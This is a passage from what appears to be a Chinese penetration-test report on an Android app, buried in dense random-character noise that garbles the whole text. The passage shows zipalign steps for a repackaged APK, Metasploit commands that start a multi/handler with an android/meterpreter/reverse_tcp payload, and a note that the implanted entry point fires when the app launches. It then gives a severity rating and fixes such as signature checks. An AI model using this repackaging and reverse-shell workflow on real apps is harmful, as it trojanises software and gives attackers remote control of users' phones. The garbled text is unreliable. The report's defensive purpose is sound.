" n6 V+ P) A# O, R. O; l( L3 ]1 \ 2 U* N0 L5 t, [. g zipalign -v 4 repackaged.apk final.apk 4 p7 N2 |8 p: Q: Q1 a7 K9 p 2 I/ \0 k2 |& y; ]% v5 W+ B$ K- E6 |6 L

8 y6 i. v+ w8 _- d( n8 l2 H 0 P6 T k7 ?. d4 o6 H 检查是否对齐 % W. e: p0 P+ T6 c' O8 @. H/ K8 o' c V8 f8 @/ n

" G3 X3 c' t6 B7 j# |6 \4 I 3 g, r; X& r" N6 p zipalign -c -v 4 final.apk 8 x! t) g3 w* ~& v5 T* d" x # H: h' L8 c4 o" j4 c

9 u' L+ i9 I8 N6 B: x 4 k$ A) K: ^7 j' u; R) r+ H6 j! C' i 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 ; Q7 w% O5 e5 I6 a4 d. V* ` 0 R( P0 T; V5 ^

3 A5 V* P% F/ `, E M3 A6 d * |; l# }* F% g0 A 启动Metasploit控制台，配置参数等待上线 ; J9 `! P1 p0 \% F; l( r1 j- I; h x- m+ S x8 I3 _ J

4 s5 |: N9 t7 d: I: D' ^4 c ! [. q* w0 f# x, g5 l1 p5 S 在终端依次输入如下命令 6 w5 c" a. v+ s) a0 T' { & `* X# h8 v* ` p

2 ^% W0 H- }9 y. U0 A* r" e0 d P. J8 f5 F8 y4 f/ }% A msfconsole & I3 G ^8 E: [; {1 @ ! e% P2 r& L) ^& V# a1 ~

- b- W5 T+ v! E+ J7 r+ e2 ?$ e" m+ [0 p5 I/ P use exploit/multi/handler 9 g( r, H& ~0 W' n3 [ - r) d& L# a1 O

3 ]- l( V. M u7 J9 t + ?' o# M& t9 q/ }/ e3 Z set PAYLOAD android/meterpreter/reverse_tcp , j M1 z d- I$ b$ [" Y& ] 3 O. \& F: }5 W |5 o: \" Y& C

) _7 _$ b1 I3 Q# ^. z % }, H# ]* Z1 X! F ] set LHOST 192.xxx.xx.xx # H. n$ m1 y" E! d3 l6 O, a- b+ [# I9 m+ Q

( u5 v- f3 F, r1 o' G5 z( q$ H J4 f6 ] X4 H4 J set LPORT 4444 2 C2 q% G9 ^7 e/ U: m* ]4 L. I, [% D % {' g; |8 D- P" e* J* U- S; s

$ Q. X1 {0 U9 {* V" _: s8 v ) w0 y1 j" L. e/ I) `0 n: H5 s exploit 8 `8 v. A7 C7 a f! @, u5 E+ B3 S% [7 e+ K, U

6 c1 c0 V+ o2 t! b& P* l , V! t& k2 W+ c$ z: c. l 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： & Z5 V1 y: [ S$ M( C6 N5 X % Y5 u- Y# A/ Z* t7 v' N( v5 l2 L

- K9 {7 P! I" j- @9 p 6 `9 u% t7 C( s' J4 r$ x# j; \ 漏洞危害：中 3 X9 {/ Z, v% ~5 W 4 A5 h3 Q/ b. H; U2 {9 M

7 v4 D7 h$ f% z8 \|0 f 3 ?! \|4 q* r2 l$ }; Q - J6 i/ _3 w1 M . A; H( ]7 e" \3 ]! r9 r 严重程度 ! j8 j* z5 K W, {! z. R; o( {% ]# n) e ( S% ?3 C! _4 A; U; g; q - ]/ Z, ~/ u9 ^7 F	; o0 V8 y% _/ x( F0 v4 e# ~( x, ]6 y7 b) t2 g 7 U) R( G; t% g8 o( K- `2 M / E; v. I6 _7 n2 u7 _% ?# o3 N. d$ ? 高 " p0 P* w- F# w7 B * e" s% u$ o1 T* ^! z : F$ F' v" k3 B( d ]4 m ; w0 F# G! E7 b. F( \; X3 h0 k	7 I+ C6 g2 {; W% I! h! e % o9 [# E7 p1 o3 N $ \|' [ F6 X2 L6 F% E/ x X( P* t- L+ @ ■ 7 D3 D, I+ }& r% I+ H6 j7 x0 m$ b+ V' d. E* y. ]( { , V1 r; h% i: q ( F" V( r* _6 j% \! B	+ N D. x5 H, C7 R' q % C; n2 _4 ]7 i: ^- @/ l' h 2 Y9 Z$ ~; Y8 f. G , `8 A7 p# _7 V* \|( V. Z3 E 中 % o) U3 N# }& ~( R" _ ) I& U2 z6 ^' e+ x( ?& z- t 2 y5 `" r4 ?* F. \2 c) }4 J& m9 x- z6 T ~8 J	$ d9 e8 Q, o5 U # u+ ?; d# X" [. t 0 @6 b5 e/ o! S3 Y3 l$ m $ V! Y1 ~1 ?: x5 w7 q 2 L j. e& [$ L" ^4 w ^6 @ & A& C, ]5 B" l2 b# A) K 3 d# U3 P. I; G% v! C) q, ~ . b s4 p6 H2 \8 F3 O- `6 p Q / K! u1 o+ Z! \. `2 q, c 7 u: x. }, k9 S3 r( R2 F& g	. Y, M: p8 I: V0 V3 C# O: z6 [2 o' i* k + [" q7 U; G5 q: k+ c$ {! T 1 f [; i4 e" c! {( e* g 低 0 z3 X* t3 D6 D' r+ }' U$ p( X# M& a* w5 J& ~, \|4 j2 t$ w 6 t$ A7 T8 z: u# r( y: E- K) T6 j& s4 W6 w# W# O1 U d6 L" k" x	" \|- q9 P' G6 _, s % { }; }' S: I2 j - N: J( @6 q a$ Z A1 J$ Y1 L+ ~# Z * @/ ^" P% z/ @+ O/ _. U " B0 ] w4 e' c" \ . P9 H$ F) t' W- I& h3 x # b I3 l" h0 ?8 j6 M& Y$ h. ]0 r( S$ x, S, s ; I1 ^* e/ ]# k4 e2 f 1 X4 F& Y$ Y) z4 r* ]5 M4 X

. C4 y8 b9 w7 i7 _4 ?( g- z3 `' E* R9 [0 W* |3 @+ w5 A2 h 8 \: ^ K: {" \( v# f5 S0 A & ]7 ]; U% s) ?6 B) C$ H7 K

. @9 E: Y1 s1 Y, w# y( w& t0 W " G9 x3 ~: b) j) o. r7 x" Q& |" | 修复方法： / f$ X4 P* P, w A' y ! k& H% }' B* Q, ^

$ Z9 z# }: E* A) G; S: b0 Y% n7 Y: X8 o( h( j 1.在 APP 启动时应做签名校验防止二次打包。
5 a. e( n+ A8 h) X- E! u; L ( M' o4 `+ l, W j6 o 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ; t+ c7 F3 a, r " Q* W" \! W) G' _7 [

% \# d; p. Z4 D+ j, e7 H! R$ p j' \) Q$ |; F& ? ; U ]4 O+ W+ P" B + y0 ` r1 {, O9 W- R% E6 U( A6 x

0 s5 H6 g* D3 v* ` + U# t7 F" a$ x/ W# j
8 P+ N' T. K& W0 D$ V5 u: R 5 R4 [+ r% n0 w$ S* O

- C+ Z2 {5 M/ ?0 U# @6 t; t1 X W+ ?* _4 ]; \# o4 `6 t 6 [3 V8 f" o2 _; R. L: q J, ~1 k6 z/ W 渗透测试时间 6 B- ~4 m! k" U0 S: H' T0 x ! C$ f+ ^- d# L6 Y 5 k' a; ?; F, r9 b! G: M6 n+ \ + K* r# j4 O- u& r' i) E' N7 M! ^
; I" q+ ?5 N; O" z2 }0 G. u# I - M6 H! ^8 I, W) s* l 3 u0 t W& n0 z0 n$ s V1 i+ Z$ \|$ C5 H. s+ V4 Q R0 C 起始时间 + O( O6 @, T ~: [" T 2 h4 H4 B2 h" d% ]$ l* ^ ; [* i0 W4 I0 _% @ * d+ Y m- S) b, m2 u7 P! Y	( W$ a& b( q; f. N; E1 T ; D! P9 c" V! H 1 b+ E! ]2 l, \5 Q% k & v$ B/ i$ X& _. d2 \0 ^% `( C 2020年4月6日 & j0 {* t2 y- f* v. Q $ n: E8 P Q% s' X+ [1 } ! }" ?, A6 d" c1 s4 B; J+ y / v( u( \|, g" c# [6 ~! w4 m. c
( V, W+ W7 Z7 M6 X8 `: D. N1 Y+ [7 h* E. \| % q$ i/ M; t; ~- I( J9 M8 [6 c6 S/ U( G6 W 结束时间 7 P* x5 W8 d8 W$ T9 r( Z/ h, } 0 H2 z- @6 e; t* r# l$ L. S . P, _* W, \0 Y 1 N0 s1 k* V# {% R7 \|/ _	. v3 A( c& L b % O; E3 e) X3 R. T' u. T! f 7 X2 {, G9 \2 b * N2 W" D/ ` }% ^8 x( v9 X 2020年4月9日 & W& T; z) c2 q8 T ( {7 D- i( G/ s' T * L$ C4 H7 a3 [! c) V& ? ( s6 L0 I S$ O" m

) v# n- J6 n+ [% v3 V" x/ s: ~5 Q& p: h, X! O9 W & K X1 L$ g3 a8 U4 l2 u ! u1 g4 G1 H. O/ G4 p- }# p 序号 5 ^7 ~# c, O U9 U 9 s4 x0 j- X9 o# A6 f2 p% Z 4 E# I4 l" E7 ~ ; `) \|" \2 {4 Y: p	/ O9 Z$ d4 w, w* A * I" _2 V+ {2 U# f8 @% ` , l- s. z( \|7 b; X/ R 8 K/ {1 _0 x+ L) h4 b. V3 B" e 测试对象 0 q# \|8 P8 p( o( v$ \5 l6 x8 G; W + x8 x% B% S3 e( `- V9 k v8 f 8 y W# e t7 A ! ]% O- s9 n$ Z9 k# p/ I	) d2 o- h( s8 u 4 r6 v" J0 M, e$ n& O / C1 Z6 z6 t; C/ r; i- \6 n6 l 8 `* o% n$ A/ h/ _4 X 测试地址 0 D6 V# @4 h. p$ I5 E* {+ Y5 I 6 ~0 U J2 W6 G- i" I , H' i8 o1 z) ~ m" o$ M+ N9 h2 c6 v/ n S- u" p, o3 _	; ~; @0 a! O( i# m ; u9 q, I1 l7 T. I6 i: E; s; s ; y1 C) z1 G- m% P1 h 8 W! d3 g ^3 H1 Q3 m3 d1 G# o 安全漏洞 * c7 k! p G8 N0 w0 n( _7 a4 T * }% T7 R" q5 M( }- y2 N ; t* O6 g6 T0 V* @5 o& T 7 n5 I. k& A3 m5 M9 B; s
9 b/ }1 m7 {) b3 N0 f) z$ e g a# @' a % y4 _, _! ]* Q& N" o( f 9 j1 \|- }3 U* R 1 ! z/ Q1 N. t- S M' I& N( \|' s$ M _4 ^ ! }6 w4 b8 [) Z( e7 D% \* g, \7 L3 Z, a& X! P3 J	% m6 \/ A: ]' L* K ) Q) r+ g6 U0 B1 [0 @1 o" n2 r ! L) z3 E! h2 Z- s; } 0 O% c% E+ \$ E5 ~& [- Y6 K& q 某某某安卓APP 5 C" X N7 u( A& u) i7 k7 X! Y& @. C" J2 m, ? 0 q+ [# B4 L- y( k3 H+ I& b 4 S1 \|/ ^4 \|2 W2 M& K	& V9 @. a; ]6 Y8 R7 b* l5 v . f& L5 L" \3 i ' J9 Y5 u5 W4 \: f 4 M7 A8 s1 \|9 C! V2 x7 J % M6 U1 s' l( }5 y2 e 3 c9 a3 ~# a( t! ]) B9 U 7 F6 \|/ O- b- j2 j6 C : }# v9 p4 A% z( U4 {5 X3 W	2 J; F/ c- D* e4 ]- X) e) @7 J. \. F* S5 w% z' I# u$ ? # S" k9 @5 J4 A$ ]7 a3 y) l8 w& ]1 i3 A9 d, V' A2 o( E/ P/ i7 W' j 2 6 m- }; h* \|5 K( U; d; u7 K $ O1 }9 i; \: g! E& C ) U: g3 q% l O ! f: ^) X6 J& e7 @; ]

中国网络渗透测试联盟